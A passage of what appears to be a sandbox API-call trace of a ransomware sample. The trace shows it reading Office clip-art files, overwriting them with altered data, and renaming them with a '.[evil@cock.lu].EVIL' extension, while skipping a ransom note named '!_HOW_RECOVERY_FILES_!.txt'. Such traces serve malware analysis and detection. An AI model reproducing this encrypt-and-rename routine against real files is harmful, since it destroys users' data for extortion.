(_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 0x45 [0127.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.539] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x788, lpOverlapped=0x0) returned 1 [0127.544] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.544] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.544] _errno () returned 0x84b1160840 [0127.544] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.544] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7a0, lpOverlapped=0x0) returned 1 [0127.544] CloseHandle (hObject=0x1a8) returned 1 [0127.544] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.545] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.545] __uncaught_exception () returned 0x84b1160800 [0127.545] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.545] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf.[evil@cock.lu].evil")) returned 1 [0127.545] ??_V@YAXPEAX@Z () returned 0x1 [0127.548] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF", dwFileAttributes=0x200) returned 0 [0127.548] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.548] wcsstr (_Str="IN00557_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.548] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 69 [0127.548] wcscmp (_String1="IN00557_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.549] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00557_.WMF") returned 0x0 [0127.549] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 0x45 [0127.549] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.551] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x23d4, lpOverlapped=0x0) returned 1 [0127.553] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.553] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.553] _errno () returned 0x84b1160840 [0127.553] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.553] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x23e0, lpOverlapped=0x0) returned 1 [0127.553] CloseHandle (hObject=0x1a8) returned 1 [0127.553] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.553] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.554] __uncaught_exception () returned 0x84b1160800 [0127.554] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.554] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf.[evil@cock.lu].evil")) returned 1 [0127.554] ??_V@YAXPEAX@Z () returned 0x1 [0127.557] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF", dwFileAttributes=0x200) returned 0 [0127.557] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.557] wcsstr (_Str="IN00915_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.557] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 69 [0127.557] wcscmp (_String1="IN00915_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.557] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00915_.WMF") returned 0x0 [0127.557] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 0x45 [0127.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.559] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x31cc, lpOverlapped=0x0) returned 1 [0127.562] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.562] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.562] _errno () returned 0x84b1160840 [0127.562] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.562] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x31e0, lpOverlapped=0x0) returned 1 [0127.562] CloseHandle (hObject=0x1a8) returned 1 [0127.562] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.563] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.563] __uncaught_exception () returned 0x84b1160800 [0127.563] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.563] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00915_.wmf.[evil@cock.lu].evil")) returned 1 [0127.563] ??_V@YAXPEAX@Z () returned 0x1 [0127.566] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF", dwFileAttributes=0x200) returned 0 [0127.566] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.566] wcsstr (_Str="IN00919_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.566] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 69 [0127.566] wcscmp (_String1="IN00919_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.566] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00919_.WMF") returned 0x0 [0127.566] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 0x45 [0127.566] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.568] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b08, lpOverlapped=0x0) returned 1 [0127.571] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.571] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.571] _errno () returned 0x84b1160840 [0127.571] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.571] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b20, lpOverlapped=0x0) returned 1 [0127.571] CloseHandle (hObject=0x1a8) returned 1 [0127.571] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.571] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.571] __uncaught_exception () returned 0x84b1160800 [0127.571] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.572] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00919_.wmf.[evil@cock.lu].evil")) returned 1 [0127.572] ??_V@YAXPEAX@Z () returned 0x1 [0127.575] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF", dwFileAttributes=0x200) returned 0 [0127.575] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.575] wcsstr (_Str="IN00956_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.575] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 69 [0127.575] wcscmp (_String1="IN00956_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.575] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00956_.WMF") returned 0x0 [0127.575] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 0x45 [0127.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.577] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4e8, lpOverlapped=0x0) returned 1 [0127.579] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.579] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.579] _errno () returned 0x84b1160840 [0127.579] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.579] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x500, lpOverlapped=0x0) returned 1 [0127.579] CloseHandle (hObject=0x1a8) returned 1 [0127.579] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.580] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.580] __uncaught_exception () returned 0x84b1160800 [0127.580] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.580] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00956_.wmf.[evil@cock.lu].evil")) returned 1 [0127.580] ??_V@YAXPEAX@Z () returned 0x1 [0127.583] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF", dwFileAttributes=0x200) returned 0 [0127.583] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.583] wcsstr (_Str="IN00957_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.583] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 69 [0127.583] wcscmp (_String1="IN00957_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.583] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00957_.WMF") returned 0x0 [0127.583] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 0x45 [0127.583] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00957_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.585] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb80, lpOverlapped=0x0) returned 1 [0127.588] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.588] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.588] _errno () returned 0x84b1160840 [0127.588] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.588] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xba0, lpOverlapped=0x0) returned 1 [0127.588] CloseHandle (hObject=0x1a8) returned 1 [0127.588] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.588] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.588] __uncaught_exception () returned 0x84b1160800 [0127.588] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.589] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00957_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00957_.wmf.[evil@cock.lu].evil")) returned 1 [0127.589] ??_V@YAXPEAX@Z () returned 0x1 [0127.592] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF", dwFileAttributes=0x200) returned 0 [0127.592] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.592] wcsstr (_Str="INDST_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.592] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 69 [0127.592] wcscmp (_String1="INDST_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.592] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="INDST_01.MID") returned 0x0 [0127.592] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 0x45 [0127.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.594] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2178, lpOverlapped=0x0) returned 1 [0127.596] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.596] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.596] _errno () returned 0x84b1160840 [0127.596] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.596] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2180, lpOverlapped=0x0) returned 1 [0127.596] CloseHandle (hObject=0x1a8) returned 1 [0127.597] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.597] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.597] __uncaught_exception () returned 0x84b1160800 [0127.597] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.597] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid.[evil@cock.lu].evil")) returned 1 [0127.598] ??_V@YAXPEAX@Z () returned 0x1 [0127.600] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID", dwFileAttributes=0x200) returned 0 [0127.600] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.600] wcsstr (_Str="J0075478.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.600] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 69 [0127.600] wcscmp (_String1="J0075478.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.600] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0075478.GIF") returned 0x0 [0127.600] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 0x45 [0127.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.603] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4c4, lpOverlapped=0x0) returned 1 [0127.606] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.606] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.606] _errno () returned 0x84b1160840 [0127.606] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.606] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4e0, lpOverlapped=0x0) returned 1 [0127.606] CloseHandle (hObject=0x1a8) returned 1 [0127.606] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.606] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.606] __uncaught_exception () returned 0x84b1160800 [0127.606] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.606] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif.[evil@cock.lu].evil")) returned 1 [0127.607] ??_V@YAXPEAX@Z () returned 0x1 [0127.610] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF", dwFileAttributes=0x200) returned 0 [0127.610] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.610] wcsstr (_Str="J0086384.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.610] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 69 [0127.610] wcscmp (_String1="J0086384.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.610] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0086384.WMF") returned 0x0 [0127.610] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF") returned 0x45 [0127.610] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.612] ReadFile (in: hFile=0x1a8, 